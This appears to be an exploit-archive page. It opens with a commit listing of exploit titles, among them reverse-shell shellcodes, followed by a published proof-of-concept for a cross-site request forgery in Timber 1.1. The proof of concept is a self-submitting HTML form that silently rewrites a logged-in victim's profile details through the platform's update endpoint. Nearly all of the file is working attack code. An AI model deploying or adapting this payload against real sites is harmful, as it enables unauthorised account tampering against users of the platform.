
16 changes to exploits/shellcodes DynoRoot DHCP - Client Command Injection DynoRoot DHCP Client - Command Injection Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution Flash ActiveX 18.0.0.194 - Code Execution Microsoft Internet Explorer 11 - javascript Code Execution Flash ActiveX 28.0.0.137 - Code Execution (1) Flash ActiveX 28.0.0.137 - Code Execution (2) GNU glibc < 2.27 - Local Buffer Overflow NewsBee CMS 1.4 - Cross-Site Request Forgery ASP.NET jVideo Kit - 'query' SQL Injection PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting OpenDaylight - SQL Injection Timber 1.1 - Cross-Site Request Forgery Honeywell XL Web Controller - Cross-Site Scripting EU MRV Regulatory Complete Solution 1 - Authentication Bypass Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)
42 lines
No EOL
1.8 KiB
HTML
42 lines
No EOL
1.8 KiB
HTML
# Exploit Title: Timber - Ultimate Freelancer Platform 1.1 - Cross site request forgery
|
|
# Date: 2018-05-24
|
|
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
|
|
# Vendor Homepage:
|
|
https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
|
|
# Version: 1.1
|
|
# Tested on: Kali linux
|
|
=========================================
|
|
|
|
# POC :
|
|
|
|
<html>
|
|
<head>
|
|
<title>CSRF POC</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://test.com/timber/request/backend/ajax/profile/update_user_profile" method="POST">
|
|
<input type="hidden" name="user_nonce" value="e748717abd" />
|
|
<input type="hidden" name="profile_avatar" value="" />
|
|
<input type="hidden" name="first_name" value="decode" />
|
|
<input type="hidden" name="last_name" value="lord" />
|
|
<input type="hidden" name="user_name" value="test" />
|
|
<input type="hidden" name="job" value="Marketing Specialist" />
|
|
<input type="hidden" name="company" value="Envato" />
|
|
<input type="hidden" name="email" value="lord@decode.com" />
|
|
<input type="hidden" name="website" value="http://envato.com" />
|
|
<input type="hidden" name="language" value="en_US" />
|
|
<input type="hidden" name="phone_num" value="+33 (0)1 42 68 53 00" />
|
|
<input type="hidden" name="country" value="FR" />
|
|
<input type="hidden" name="city" value="Paris" />
|
|
<input type="hidden" name="address1" value="8 Rue de Londres" />
|
|
<input type="hidden" name="address2" value="75009 test" />
|
|
<input type="hidden" name="zip_code" value="" />
|
|
<input type="hidden" name="vat_nubmer" value="" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
========================================== |